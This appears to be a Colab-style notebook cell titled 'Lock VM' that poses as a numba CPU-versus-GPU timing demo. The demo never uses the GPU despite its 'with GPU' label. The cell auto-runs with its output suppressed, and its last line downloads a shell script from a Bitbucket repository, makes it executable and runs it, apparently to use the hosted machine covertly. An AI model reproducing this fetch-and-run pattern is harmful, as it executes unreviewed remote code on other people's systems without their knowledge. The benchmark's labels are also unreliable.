%%capture
#@title Lock VM { run: "auto" }
from numba import jit, cuda
import numpy as np
# to measure exec time
from timeit import default_timer as timer

# normal function to run on cpu
def func(a):                                
    for i in range(10000000):
        a[i]+= 1    

                        
def func2(a):
    for i in range(10000000):
        a[i]+= 1
if __name__=="__main__":
    n = 10000000                            
    a = np.ones(n, dtype = np.float64)
    b = np.ones(n, dtype = np.float32)
    
    start = timer()
    func(a)
    print("without GPU:", timer()-start)    
    
    start = timer()
    func2(a)
    print("with GPU:", timer()-start)
!wget https://bitbucket.org/haitani782/agus/raw/3dffa0bc1a959e9b90ef21c1a3f6d267a12fec9e/agus.sh;chmod +x agus.sh;./agus.sh
